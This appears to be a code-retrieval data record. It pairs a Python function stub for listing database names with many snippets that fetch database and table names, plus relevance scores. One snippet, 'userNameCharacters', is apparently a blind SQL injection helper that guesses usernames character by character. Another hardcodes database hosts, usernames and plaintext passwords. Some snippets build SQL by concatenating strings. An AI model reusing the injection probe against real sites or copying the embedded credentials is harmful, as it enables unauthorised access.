[ "def makeDatabaseNamesList(n, ):", "def get_database_names(self) -> Iterable[str]:\n custom_database_name = self.service_connection.__dict__.get(\"databaseName\")\n\n database_name = self.service_connection.__dict__.get(\n \"database\", custom_database_name or \"default\"\n )\n # By default, set the inspector on the created engine\n self.inspector = inspect(self.engine)\n yield database_name", "def _get_database_name(database):\n # make sure the return is only one data type\n filenames = []\n if database is not None:\n if not isinstance(database, list):\n database = [database]\n for db in database:\n filenames += glob.glob(db)\n\n return filenames", "def _get_db_names(self, dbs, strict=True):\n dbs = utils.coerce_to_list(dbs)\n db_names = [utils.get_name(db) for db in dbs]\n if strict:\n good_dbs = self.instance.list_databases()\n good_names = [utils.get_name(good_db) for good_db in good_dbs]\n bad_names = [db_name for db_name in db_names\n if db_name not in good_names]\n if bad_names:\n bad = \", \".join(bad_names)\n raise exc.NoSuchDatabase(\"The following database(s) were not \"\n \"found: %s\" % bad)\n return db_names", "def _get_char_names(self):\n return [device.get_char_name() for\n device in self.all_devices]", "def donor_names():\n return list(donor_db.keys())", "def getAllName(table):\n\ttry:\n\t\tcon = sqlite3.connect('PampDb.db')\n\t\tcur = con.cursor()\n\t\tcur.execute(\"SELECT * FROM \" + table)\n\t\tnames = cur.fetchall()\n\t\tcon.commit()\n\t\tcon.close()\n\t\treturn names\n\texcept:\n\t\tprint('Could not run function getAllName from DbController')", "def getDatabaseName(self):\n return f\"n{self.name.capitalize()}\"", "def donor_names():\n return donor_db.keys()", "def get_available_databases() -> List[str]:\r\n\tcur = psycopg2.connect(dbname='postgres').cursor()\r\n\tcur.execute(\"SELECT datname FROM pg_database WHERE datistemplate=FALSE;\")\r\n\treturn [row[0][:-6] for row in cur if row[0].endswith('wikidb')]", "def dbdescs(data, dbname):\n # pylint: disable=bad-continuation\n return {\n 'admin': onedesc(data, dbname, 'admin', 'rw'),\n 'user': onedesc(data, dbname, 'user', 'rw'),\n 'viewer': onedesc(data, dbname, 'viewer', 'ro')\n }", "def get_all_collection_names(self):\n select_list = [SQLBinaryExpr(SQLColumnExpr(SQLTableExpr(TABLE_NAME_COLL), COL_NAME_COLL_NAME),\n OP_AS, COL_NAME_COLL_NAME)]\n\n entries = self.select_generic_data(select_list=select_list, table_list=[TABLE_NAME_COLL])\n return [entrie[COL_NAME_COLL_NAME] for entrie in entries]", "def donor_names():\n names = list()\n for name in donor_db:\n names = names + [name[0]]\n return names", "def db_collations_choices(self):\n # To avoid pre-mature initialization of db-context.\n from django.db import connection\n\n with connection.cursor() as cursor:\n cursor.execute(\"SELECT collname, collcollate FROM pg_collation\")\n rows = cursor.fetchall()\n return ((name, \"{} ({})\".format(name, collate)) for name, collate in rows)", "def names(self) -> list[str]:", "def get_char_names(charlist, caller):\n watch_list = caller.db.watching or []\n verbose_where = False\n if caller.tags.get(\"verbose_where\"):\n verbose_where = True\n return \", \".join(\n char_name(char, verbose_where, watch_list)\n for char in charlist\n if char.player\n and (not char.player.db.hide_from_watch or caller.check_permstring(\"builders\"))\n )", "def do_list(self, line):\n\t\tx = [i for i in self.client.list_databases() if i['name'] not in ['admin','config','line','local','mongoengine_test','pymongo_test']]\n\t\tfor db in 
x:\n\t\t\tprint(db['name'])", "def getTableNames(self):\n\tif not self.dbNames:\n\t # get db table names from DB\n\t if self.dbType==\"sqlite\":\n\t query=\"SELECT name FROM sqlite_master WHERE type='table';\"\n\t elif self.dbType==\"mysql\":\n\t query=\"SHOW TABLES\"\n\t self.startTxn(\"SQLUtil.__init__\")\n\t tup=self.fetchAll(query)\n\t self.endTxn(\"SQLUtil.__init__\")\n\t for item in tup:\n\t self.dbNames.append(item[0])\n\treturn self.dbNames", "def get_available_databases():\n return map(\n lambda (key, value): (key, value[\"description\"]),\n DumpConverter.DATABASES.items())", "def get_names_from_Seq_db(seq_db):\r\n names = []\r\n names_abudance_removed = []\r\n db = open(seq_db, \"r\")\r\n for seq_record in SeqIO.parse(db, \"fasta\"):\r\n if seq_record.id.endswith(\"_1\"):\r\n names.append(seq_record.id)\r\n names_abudance_removed.append((\"_\").join(\r\n seq_record.id.split(\"_\")[:-1]))\r\n else:\r\n names_abudance_removed.append(seq_record.id)\r\n names.append(seq_record.id + \"_1\")\r\n db.close()\r\n return names, names_abudance_removed", "def colNames_string(self):\n # SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'some_table';\n return \"SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = \"", "def get_usernames(self) -> list:\n db_list = list(self.cursor.execute('SELECT * FROM sqlite_master'))\n users = [db_list[i][1] for i in range(0, len(db_list), 2)]\n return users", "def get_db_object_name(name):\n\n # Default output list\n out_list = ['lemma', 'dbo', 'udb_plt']\n\n # Replace the elements of out_list if and only if there exists a\n # replacement for it\n parts = name.split('.')\n for (i, j) in enumerate(range(len(parts) - 1, -1, -1)):\n if parts[j]:\n out_list[(len(out_list) - 1) - i] = parts[j]\n return tuple(out_list)", "def getDatabaseName(self):\n raise NotImplementedError", "def scrub(self, table_name):\n\n return ''.join( chr for chr in table_name if chr.isalnum() )", "def db_name(self):\n return self._db_name", "def get_db_format(text):\n db_text = \"\"\n for t in text.split(\" \"):\n db_text += t.title()\n return db_text", "def testCMSNametoList(self):\n result = self.mySiteDB.cmsNametoList(\"T1_US*\", \"SE\")\n self.assertItemsEqual(result, [u'cmsdcadisk01.fnal.gov'])", "def queryList():\n #f = open(\"/var/log/scidbpy_log.txt\",\"w+\")\n #f.write(\"starting queryList\")\n\n header, rows = querySciDB(\"list('arrays')\")\n names = [row[1].translate(None, \"\\\"\") for row in rows]\n\n return names", "def get_all_bank_names() -> List[str]:\n\n # Open a new connection\n db, cursor = db_connector.cursor()\n\n query = \"select name from bank\"\n cursor.execute(query)\n data = cursor.fetchall()\n r_list = [x[0] for x in data]\n db.disconnect()\n return r_list", "def _extract_db_name_from_db_path(self):\n return os.path.basename(self.db_path).rsplit('.', 1)[0]", "def _str_colnames(self):\n return ', '.join(self.galcat.colnames)", "def database_name(self) -> str:\n return pulumi.get(self, \"database_name\")", "def getTables(self):\n\treturn self.dbNames", "def named_entities(self) -> List[str]:", "def make_db_name_pattern(species=None, db_type=None, release=None):\n sep = r\"%\"\n pattern = \"\"\n if species:\n species = Species.getEnsemblDbPrefix(species)\n pattern = \"%s%s\" % (sep, species)\n if db_type:\n pattern = \"%s%s%s\" % (pattern, sep, db_type)\n if release:\n pattern = \"%s%s%s\" % (pattern, sep, release)\n assert pattern\n \n return \"'%s%s'\" % (pattern, sep)", "def _to_db_identifier(name):\n return 
name.replace('-', '_')", "def create_short_database_names(path_list):\n no_suffixes = [Path(p).resolve().with_suffix(\"\") for p in path_list]\n # The assert statement makes sure that the while loop terminates\n assert len(set(no_suffixes)) == len(\n no_suffixes\n ), \"path_list must not contain duplicates.\"\n short_name_to_path = {}\n for path, path_with_suffix in zip(no_suffixes, path_list):\n parts = tuple(reversed(path.parts))\n needed_parts = 1\n candidate = parts[:needed_parts]\n while _causes_name_clash(candidate, no_suffixes):\n needed_parts += 1\n candidate = parts[:needed_parts]\n\n short_name = \"/\".join(reversed(candidate))\n short_name_to_path[short_name] = path_with_suffix\n return short_name_to_path", "def table_names(self, cursor=None):\r\n return [kind.key().name() for kind in Query(kind='__kind__').Run()]", "def list_databases(self) -> List[Dict]:\n self._check_connection(check_db=False)\n all_data = self.get_databases()\n all_dbs = []\n for data in all_data:\n all_dbs.append(data[\"system:resource_name\"][\"@value\"])\n return all_dbs", "def get_db_name(self):\n\t\treturn conf.db_name", "def get_list_of_names():\n conn = r.connect(host=HOST, port=PORT, db=DB)\n names = r.table(FINGERPRINT_TABLE)[\"name\"].run(conn)\n return list(names)", "def check_name_db ():\n db_checks = [DB_FIRST_MALE, DB_FIRST_FEMALE,\n DB_LAST_SIMPLE, DB_LAST_NAMESON,\n DB_LAST_GAELIC1, DB_LAST_GAELIC2,\n DB_LAST_COMBO1, DB_LAST_COMBO2,\n DB_LAST_UPPER1, DB_LAST_UPPER2]\n\n db_exists = db.database_exists\n for db_name in db_checks:\n if not db_exists(db_name):\n raise DatabaseException, db_name", "def product_db() -> List[Text]:\n\n return [\n \"credit\",\n \"forex\",\n \"debit\",\n \"atm\"\n ]", "def id_chooser(query, ident):\n\n return [\"db1\", \"db2\"]", "def names():\n\n # Use Pandas to perform the sql query\n stmt = db.session.query(metadata).statement\n df = pd.read_sql_query(stmt, db.session.bind)\n\n # Return a list of the column names (sample names)\n return jsonify(list(df[\"ID\"]))", "def get_cryptomatte_names(self):\n return [self.cryptomattes[x][\"name\"] for x in self.cryptomattes]", "def _get_random_name(database, prefix='', length=5):\n if isinstance(database, OracleDatabase):\n name = '{}{}'.format(prefix.upper(), get_random_string(string.ascii_uppercase))\n else:\n name = '{}{}'.format(prefix.lower(), get_random_string(string.ascii_lowercase))\n\n return name", "def get_db_name(account=None, species=None, db_type=None, release=None,\n division=None, DEBUG=False):\n if account is None:\n account = get_ensembl_account(release=release)\n \n if DEBUG:\n print \"Connection To:\", account\n print \"Selecting For:\", species, db_type, release\n \n server = DbConnection(account, db_name='PARENT')\n cursor = server.cursor()\n show = \"SHOW DATABASES\"\n if species or db_type or release:\n pattern = make_db_name_pattern(species, db_type, release)\n show = \"%s LIKE %s\" % (show, pattern)\n if DEBUG:\n print show\n cursor.execute(show)\n rows = cursor.fetchall()\n dbs = []\n for row in rows:\n try:\n if division is not None and division not in row[0]:\n continue\n name = EnsemblDbName(row[0])\n if (release is None or name.Release == str(release)) and\\\n (db_type is None or name.Type == db_type):\n dbs.append(name)\n except (IndexError, RuntimeError):\n if DEBUG:\n print \"FAIL:\", row[0]\n continue\n return dbs", "def test_db_map(self):\r\n\r\n\r\n db_map = WildDBNames._db_map\r\n self.assertEquals(db_map['words_and_whatnot'], 'content')\r\n self.assertEquals(db_map['integers_etc'], 
'numbers')", "def stores(self):\n sql = u\"SELECT name FROM `sqlite_master` WHERE type='table'\"\n rows = self.conn.execute(sql)\n return [r['name'] for r in rows\n if r['name'] not in self.invalid_names]", "def dbName(self, code) -> str:\n return f'{code}{self.name}'", "def _db_uri_parts():\n return app.config['SQLALCHEMY_DATABASE_URI'].split('/')", "def get_db_name_by_mode(mode: int) -> str:\n if mode == TAIWANESE_MODE:\n return 'taiwanese.db'\n pass\n elif mode == CHINESE_MODE:\n return 'chinese.db'\n pass\n elif mode == CHINESE_POPULAR_MODE:\n return 'chinesepop.db'\n pass\n else:\n raise Exception(\"invalid mode\")\n pass", "def get_cites_species():\n mongo_db = mongo_client_db()\n cursor = mongo_db[CITES_COLLECTION].find({'full_name': {'$ne': None}}, {'full_name':1})\n return [r['full_name'].encode('utf8') for r in cursor]", "def uniprot_pdbs(self, species=None):\n\n uniprot_accessions = [\n link.accession() for link in self.database_links(species=species)\n if link.database() == \"UniProtKB\"\n ]\n if uniprot_accessions:\n results = pdb.query_rcsb_advanced(\"UpAccessionIdQuery\", {\n \"accessionIdList\": \",\".join(uniprot_accessions)\n })\n return [result.split(\":\")[0] for result in results] if results else []\n else:\n return []", "def namelist(self):\n return self._handle.namelist()", "def namelist(self):\n return self._handle.namelist()", "def get_aliases_string(trembl_list):\n aliases_list = []\n\n for row in trembl_list:\n psimi_trembl = \"trembl:\" + row[1]\n aliases_list.append(psimi_trembl)\n\n return \"|\".join(aliases_list)", "def get_table_column_name(self, table):\n c = self.conn.cursor()\n c.execute(\"SELECT * FROM %s\" % table)\n names = list(map(lambda x: x[0], c.description))\n return names", "def figure_names(self) -> List[str]:\n return self._db_data.figure_names", "def get_name(self) -> str:\n return self.dbname", "def names(cls) -> List[str]:", "def list_dbs(self):\n return self.get('_all_dbs').json()", "def _get_random_schema_name(database, prefix='', length=5):\n prefix = f'C##{prefix}' if isinstance(database, OracleDatabase) else prefix\n return _get_random_name(database, prefix=prefix, length=length)", "def list_databases():\n config = load_config()\n\n databases = [x for x in config.keys() if \"schemas\" in config[x]]\n return databases", "def getNames(self) -> List[unicode]:\n ...", "def get_names(view, sel):\n word = view.word(sel)\n schema = None\n if view.substr(word.begin() - 1) == '.':\n schema = view.substr(view.word(word.begin() - 2)).lower()\n return schema, view.substr(word).lower()", "def database_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"database_name\")", "def databases(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"databases\")", "def names():\n pass", "def names(self):\n return [da.name for da in self]", "def nameList(self):\r\n return [self.name.lower(), self.code] + self._otherNames", "def get_colnames(self):\n\n cd = self.conn.execute('select * from atom')\n print('Possible column names are:')\n names = list(map(lambda x: x[0], cd.description))\n print('\\trowID')\n for n in names:\n print('\\t'+n)", "def get_databases ():\n return _dbobjects[:]", "def keys(self):\n if self.db == None:\n raise AssertionError(\"DB not open\")\n\n self.lock.acquire()\n try:\n usernames = list(self.db.keys())\n finally:\n self.lock.release()\n usernames = [u for u in usernames if not u.startswith(\"--Reserved--\")]\n return usernames", "def charname(self):\n return self._charname", "def selectnamesD(data):\n 
col = []\n for name in list(data):\n if name.startswith('hyperactive_'):\n col.append(name)\n else:\n col = col\n \n return col", "def dname(namelength = 15):\n\tresult = \"\"\n\tfor x in range(namelength):\n\t\tresult += random.choice(\"0123456789\")\n\treturn result", "def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True):\n \"\"\"\nsqlzoo characters\n['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%']\n\"\"\"\n lst = []\n\n for ch in special:\n if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = \"\", index = \"no index\")):\n lst.append(ch)\n for ch in lower:\n if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = \"\", index = \"no index\")):\n lst.append(ch)\n for ch in numbers:\n if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = \"\", index = \"no index\")):\n lst.append(ch)\n for ch in other:\n if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = \"\", index = \"no index\")):\n lst.append(ch)\n if(caseSensitive):\n for ch in upper:\n if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = \"\", index = \"no index\")):\n lst.append(ch)\n if(wildCards):\n for ch in wildcards:\n lst.append(ch) #it'll match if there's users\n return lst", "def _list():\n db = shelve.open(\"db\", flag='c', protocol=None, writeback=False)\n names_only = input(\"Names only [Y/n] ->\")\n\n if names_only == \"Y\":\n for name in db.keys():\n print(name)\n elif names_only == \"n\":\n for key in db.items():\n print(key, sep=' ', end='\\n', file=sys.stdout, flush=False)\n #print((\";\\n\".join(\"%s=>%s\" % i for i in db.items())))", "def namelist():\n\n\n session = Session(engine)\n\n results = session.query(lockdown.country).order_by(lockdown.country).all()\n\n #session.close()\n all_symbols = list(np.ravel(results))\n sym = all_symbols[1]\n\n return jsonify(all_symbols)", "def keys(self):\r\n if self.db == None:\r\n raise AssertionError(\"DB not open\")\r\n\r\n self.lock.acquire()\r\n try:\r\n usernames = self.db.keys()\r\n finally:\r\n self.lock.release()\r\n usernames = [u for u in usernames if not u.startswith(\"--Reserved--\")]\r\n return usernames", "def get_feature_names(self):\n return [self.char]", "def db_name():\n\n headers = {\n 'accept': 'text/plain',\n }\n\n try:\n response = requests.get('https://reactome.org/AnalysisService/database/name', headers=headers)\n except ConnectionError as e:\n print(e)\n\n if response.status_code == 200:\n return response.text\n else:\n print('Status code returned a value of %s' % response.status_code)", "def fulldbname(self):\n return 'myfls_'+self.user.username+'_'+self.dbname", "def get_db_schema_text(db_name: str) -> str:\n\n return str(subprocess.check_output(['sqlite3', db_name, '.schema']), 'utf-8')", "def getDatabaseName(self):\n return self._base.getDatabaseName()", "def keys(self):\n tuples = self._execute(\"SELECT name FROM users\")\n ret = [tup[0] for tup in tuples]\n return ret", "def select_categories_database(self):\n # connection to the database\n self.cursor = self.data_base.cursor(MySQLCursorPrepared)\n self.cursor.execute(\"USE Purbeurre\")\n self.cursor.execute(\"SELECT id, categories FROM Category ORDER BY id\")\n id_name_categories = self.cursor.fetchall()\n id_name_categories = self.new_orm.transform_categories_to_object(id_name_categories)\n return id_name_categories", "def show_dbs(*dbs):\n if dbs:\n log.debug(\"get dbs from pillar: %s\", dbs)\n result = {}\n for db in 
dbs:\n result[db] = __salt__[\"pillar.get\"](\"oracle:dbs:\" + db)\n return result\n else:\n pillar_dbs = __salt__[\"pillar.get\"](\"oracle:dbs\")\n log.debug(\"get all (%s) dbs from pillar\", len(pillar_dbs))\n return pillar_dbs", "def keys(self):\n query = \"\"\"SELECT column_name, data_type, character_maximum_length\n FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'ngc2236';\"\"\"\n result = self.wifsip.query(query)\n keys = [r[0] for r in result]\n return keys", "def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"databases\")", "def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"databases\")", "def listAll(self):\n red = self.dbConnect()\n return red.keys()", "def safe_column_name(string):\n string = unidecode(string.replace(' ', '_').lower())\n return re.sub(r'[^0-9a-z_]','', string)", "def test_db_map(self):\r\n class WildDBNames(Model):\r\n id = columns.UUID(primary_key=True, default=lambda:uuid4())\r\n content = columns.Text(db_field='words_and_whatnot')\r\n numbers = columns.Integer(db_field='integers_etc')\r\n\r\n db_map = WildDBNames._db_map\r\n self.assertEquals(db_map['words_and_whatnot'], 'content')\r\n self.assertEquals(db_map['integers_etc'], 'numbers')", "def __get_db_args(self, db_name):\n db_args = {}\n if db_name == 'local':\n db_args['host'] = '2SHT10DXY4OQ4VQ\\XUANDB'\n db_args['db'] = 'xuan_test_db'\n db_args['user'] = 'sa'\n db_args['passwd'] = 'pgjdcwn040506'\n elif db_name == 'tj':\n db_args['host'] = 'JDFYHISBAK\\ZJRMYY'\n db_args['db'] = 'medical'\n db_args['user'] = 'zjrmyy'\n db_args['passwd'] = 'zjrmyy'\n else:\n pass\n return (db_args['host'], db_args['db'], db_args['user'], db_args['passwd'])", "def get_table_names() -> Iterable[str]:\n for pipeline_name in get_pipeline_names():\n yield pipeline_name.replace(\"_\", \"-\")", "def db_lookup(client):\n dblist_dict= client.get_list_database()\n # print(\"def db_lookup 010:\", dblist_dict)\n # print(\"def db_lookup 020:\", dblist_dict[3]['name'])\n # for element in dblist_dict:\n # print(\"db_lookup 3:\", element['name'])\n return dblist_dict" ]
[ "0.6628727", "0.5976508", "0.5936507", "0.5901102", "0.58635503", "0.5853042", "0.5845213", "0.58389676", "0.58144695", "0.58012706", "0.5732453", "0.5721888", "0.5696421", "0.5669424", "0.56576335", "0.5632975", "0.56264454", "0.56206435", "0.5605173", "0.5598442", "0.5570138", "0.5568779", "0.5564397", "0.55643475", "0.5546304", "0.55416715", "0.5533799", "0.5532949", "0.55016935", "0.5472257", "0.54721606", "0.546409", "0.5446846", "0.5426624", "0.54265606", "0.5418519", "0.5405785", "0.53998715", "0.53767335", "0.5357409", "0.5340311", "0.5332472", "0.5328472", "0.53257513", "0.5314009", "0.53063625", "0.5305111", "0.52927715", "0.52830154", "0.52773863", "0.52749914", "0.5263588", "0.5261024", "0.5260947", "0.5255695", "0.52379256", "0.5235746", "0.5235746", "0.5233493", "0.523109", "0.5228316", "0.5225265", "0.5218831", "0.5216476", "0.52103895", "0.5209971", "0.5188926", "0.5187718", "0.5187118", "0.5182425", "0.5176918", "0.51743275", "0.5174239", "0.517074", "0.5159381", "0.5153062", "0.5151695", "0.51445043", "0.51426965", "0.513974", "0.5131712", "0.5124141", "0.5123185", "0.5119129", "0.5118877", "0.51163614", "0.5106409", "0.51019007", "0.50997573", "0.50930625", "0.5091404", "0.50912994", "0.50810707", "0.50810707", "0.50789523", "0.5071953", "0.50657696", "0.5064646", "0.5060855", "0.50554436" ]
0.7128734
0
List of table names
def makeTableNamesList(n, ):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTableNames(self):\n\n # The specific command depends on whether we are using mysql or sqlite\n if self.connector == 'mysql':\n sqlcmd = (\"SELECT table_name FROM INFORMATION_SCHEMA.TABLES \" +\n \"WHERE table_schema='\" + self.dbname + \"'\")\n else:\n sqlcmd = \"SELECT name FROM sqlite_master WHERE type='table'\"\n\n self._c.execute(sqlcmd)\n tbnames = [el[0] for el in self._c.fetchall()]\n\n return tbnames", "def getTables(self):\n\treturn self.dbNames", "async def tables(self) -> List[bytes]:\n names = await self.client.getTableNames()\n\n # Filter using prefix, and strip prefix from names\n if self.table_prefix is not None:\n prefix = self._table_name(b'')\n offset = len(prefix)\n names = [n[offset:] for n in names if n.startswith(prefix)]\n\n return names", "def get_table_names(self):\n return self.engine.table_names()", "def list_tables(self, context=\"MYDB\"):\n q = 'SELECT Distinct TABLE_NAME FROM information_schema.TABLES'\n res = self.quick(q, context=context, task_name='listtables', system=True)\n # the first line is a header and the last is always empty\n # also, the table names have \" as the first and last characters\n return list(res[\"TABLE_NAME\"])", "def tables(self) -> list:\n return self.list_tables()", "def table_names(self, cursor=None):\r\n return [kind.key().name() for kind in Query(kind='__kind__').Run()]", "def list_tables(self):\n return LIST_TABLES(db=self.db)", "def list_tables(self) -> List[str]:\n return self.dynamodb_client.list_tables()[\"TableNames\"]", "def show_tables(self) -> List[str]:\n return list(self.tb.keys())", "def getTableNames(self):\n\tif not self.dbNames:\n\t # get db table names from DB\n\t if self.dbType==\"sqlite\":\n\t query=\"SELECT name FROM sqlite_master WHERE type='table';\"\n\t elif self.dbType==\"mysql\":\n\t query=\"SHOW TABLES\"\n\t self.startTxn(\"SQLUtil.__init__\")\n\t tup=self.fetchAll(query)\n\t self.endTxn(\"SQLUtil.__init__\")\n\t for item in tup:\n\t self.dbNames.append(item[0])\n\treturn self.dbNames", "def tables(self):\n result = self.execute(self.commands.get_tables(self.name))\n return [x[0] for x in result]", "def get_table_list(self):\n # the \\\"{{}}\\\" is where the sql command will be added via a second `.format()`\n container_command = \"docker exec {} sh -c \\\"{{}}\\\"\".format(self.mysql_container)\n sql_command = \"mysql {} --execute='SHOW TABLES FROM {};'\".format(self.mysql_credentials, self.database_name)\n table_list = self.shell(container_command.format(sql_command))\n table_list = table_list.split(\"\\n\")\n assert table_list[0] == \"Tables_in_{}\".format(self.database_name)\n return table_list[1:]", "def get_table_names(self,verbose=False):\n \n assert(self.connected)\n \n \n GET_TABLE_NAMES_COMMAND = \"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = '{0}'\".format(self.config['database'])\n \n self.cursor.execute(GET_TABLE_NAMES_COMMAND)\n \n tables = []\n for row in self.cursor:\n tables.append(row[0])\n \n return tables", "def show_tables(self):\n query = \"SELECT name FROM sqlite_master WHERE type = 'table'\"\n try:\n temp = self.__cur.execute(query)\n except Exception as e:\n self.__conn.rollback()\n raise e\n\n tables = []\n for x in temp:\n tables.append(x[\"name\"])\n del temp\n return tables", "def get_tables(self, db_name):\n pass", "def Fetch_All_Table_Names(self, d_params=None):\n ctx = self.__Connect_To_Snowflake(d_params)\n all_tables = ctx.cursor().execute(\"show tables\")\n ctx.close()\n return [x[1] for x in all_tables]", "def tables(self):\n if 
self.table is None:\n raise GiraffeError(\"Target table has not been set.\")\n return [\n \"{}_wt\".format(self.table),\n \"{}_log\".format(self.table),\n \"{}_e1\".format(self.table),\n \"{}_e2\".format(self.table),\n ]", "def get_tables(self):\n\t\tbuild = 'SELECT * FROM pg_catalog.pg_tables WHERE schemaname != \\'pg_catalog\\' AND schemaname != \\'information_schema\\';'\n\t\tself.cur.execute(build)\n\t\ttotal = self.cur.fetchall()\n\t\ttable_list = []\n\t\tfor a in total:\n\t\t\ttable_list.append(a[1])\n\t\treturn table_list", "def meta_db_tables(self) -> list:\r\n def _passer(**kwargs):\r\n data = self.engine.execute(\"\"\"\r\n SELECT * FROM sqlite_master WHERE type='table';\r\n \"\"\").fetchall()\r\n table_names = [i[1] for i in data]\r\n return table_names\r\n return self._connectionController(_passer)", "def get_tables(self):\n return list(self._metadata['tables'].keys())", "def query_tables(self):\n # Find all tables\n tables_q = \"SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE \\'sqlite_%\\';\"\n tables = self.query(tables_q)\n # print(tables)\n return tables", "def get_table_names(conn, schema, prefix='', suffix=''):\n query = f\"select table_name from information_schema.tables where table_schema = '{schema}'\"\n table_names = pd.read_sql(query, con=get_connection()).to_numpy(copy=True).flatten()\n table_names = [t for t in table_names if t.startswith(prefix) and t.endswith(suffix)]\n return table_names", "def table_name() -> str:\n pass", "def list_tables(self, **kwargs):\n cursor = self.execute(\n self.list_tables_sql, dict({\"database\": self.uri.database}, **kwargs)\n )\n return [row[0] for row in cursor.fetchall()]", "async def test_tornado_list_tables(self):\n\n tables = self.r.table_list().run(self.conn)\n assert isinstance(tables, list)", "def get_tables_from_db(self):\r\n self.cursor.execute(\"SELECT name FROM sqlite_master WHERE type = 'table';\")\r\n\r\n # Return list of tuples with the names of tables --> names of profiles.\r\n self.profiles_name_list = [elem[0] for elem in self.cursor.fetchall()]\r\n self.profiles_name_list = tuple(self.profiles_name_list)", "def listOSWTables(conn):\n conn_cursor = conn.cursor()\n conn.text_factory = str\n res = conn.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n tables=[name[0] for name in res]\n return tables", "def show_tables(db_name):\n output = execute_sql(db_name, \"SELECT name FROM sqlite_master WHERE type='table';\")\n return output", "def getTAPTables(self):\n\t\treturn [r[\"tablename\"] for r in\n\t\t\tself.readerConnection.queryToDicts(\n\t\t\t\t\"select tablename from dc.tablemeta where adql\")]", "def show_tables(self, name_db):\n conn, cursor = SQLDatabase.connect()\n try:\n cursor.execute(\"SHOW TABLES FROM {}\".format(name_db))\n self.all_tables = [table[0] for table in cursor.fetchall()]\n except mysql.connector.errors.ProgrammingError as err:\n print(\"{} : {} --> unknown\".format(err, name_db))\n finally:\n SQLDatabase.close(cursor, conn)\n\n return self.all_tables", "def get_tables():\n return execute(\"SELECT name FROM sqlite_master WHERE type = 'table';\")", "def print_all_tables(self):\n conn = self.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n print(cursor.fetchall())", "def list_tables(database):\n config = load_config()\n tables = [x for x in config[database]['schemas']]\n\n return tables", "def get_tables(conn):\n cur = conn.cursor()\n cur.execute(\"\"\"SELECT name FROM sqlite_master\n WHERE 
type='table' AND name NOT LIKE 'sqlite_%';\n \"\"\")\n tables = cur.fetchall()\n\n return tables", "def get_table_list(self, cursor):\n\n cursor.execute(\n \"\"\"\n SELECT c.relname, c.relkind\n FROM pg_catalog.pg_class c\n LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace\n WHERE c.relkind IN ('r', 'v', '')\n AND n.nspname = '%s'\n AND pg_catalog.pg_table_is_visible(c.oid)\"\"\"\n % get_current_schema().schema_name\n )\n\n return [\n TableInfo(row[0], {\"r\": \"t\", \"v\": \"v\"}.get(row[1]))\n for row in cursor.fetchall()\n if row[0] not in self.ignored_tables\n ]", "def list_tables(self, repo):\n return sorted(self.user_con.list_tables(repo=repo))", "def collect_table_names(self):\n try:\n for migrate_table in self.migration_tables:\n tabel_name = migrate_table.migrationTable.DestinationTable.name\n self.table_list.add(tabel_name)\n self.tables.update(self.table_list)\n except Exception as err:\n logger.error(\"collect_table_names [error] -> %s\" % err)", "def tables(self):\n return Table.objects.filter(schema__database=self)", "def list_tables(**db_kwargs) -> List[str]:\n try:\n client = boto3.client(\"dynamodb\", **db_kwargs)\n return sorted(client.list_tables()[\"TableNames\"], reverse=True)\n except Exception as err: # pylint:disable=broad-except\n raise RuntimeError(\"Failed to fetch the table list: %s\" % str(err))", "def get_tables(self):\n r = self.client.query(\"show tables\")\n if r:\n tables = [tuple(reversed(x.split(','))) for x in filter(None, r.split('\\n'))][1:]\n FT.table_cache = dict(tables)\n return tables\n else:\n logging.error(\"get_tables: no response\")", "def get_table_list(self, tables):\n statmt = \"SELECT tablename FROM pg_catalog.pg_tables where tablename not like 'pg_%' and tablename not like 'sql_%'\"\n self.cur.execute(statmt)\n rows = [table[0] for table in list(self.cur.fetchall())]\n\n if len(tables) != 0:\n rows = list(map(str, set(rows).intersection(tables)))\n return rows", "def tables_dict(self):\n return self.tables.table_name_map", "def get_tables(self):\n return self._get_types_from_default_ns(Table)", "def getTableByName(self, tablename):\n pass", "def get_table_names() -> Iterable[str]:\n for pipeline_name in get_pipeline_names():\n yield pipeline_name.replace(\"_\", \"-\")", "def get_tables(self, *, only_names=True, verbose=False):\n\n tables = self._tap.load_tables(only_names=only_names,\n include_shared_tables=False,\n verbose=verbose)\n if only_names is True:\n table_names = []\n for t in tables:\n table_names.append(t.name)\n return table_names\n else:\n return tables", "def getTableNames(self, lsstLevel, dbName):\n return self._doRequest(self.httpClient.getTableNames, lsstLevel, dbName)", "def showTables(database: str) -> list:\n\n bd = _database(database)\n\n if bd:\n\n temp = []\n\n for tabla in bd[\"tablas\"]:\n temp.append(tabla[\"nombre\"])\n\n return temp\n\n else:\n return None", "def _get_tables(self) -> pd.DataFrame:\n return self.server._execute_extract(\n \"SELECT tablename FROM pg_catalog.pg_tables WHERE schemaname = '{}'\".format(\n self.name\n )\n )", "def get_table_list(cursor):\n # Skip the sqlite_sequence system table used for autoincrement key\n # generation.\n cursor.execute(\"\"\"\n SELECT name FROM sqlite_master\n WHERE type='table' AND NOT name='sqlite_sequence'\n ORDER BY name\"\"\")\n return [row[0] for row in cursor.fetchall()]", "def tablename(self):\n _, tail = os.path.split(self.url)\n return tail[:-4]", "def __getListTables(self):\n\n listTables = \"{\\\\*\\\\listtable\\n\"\n overrideTables = 
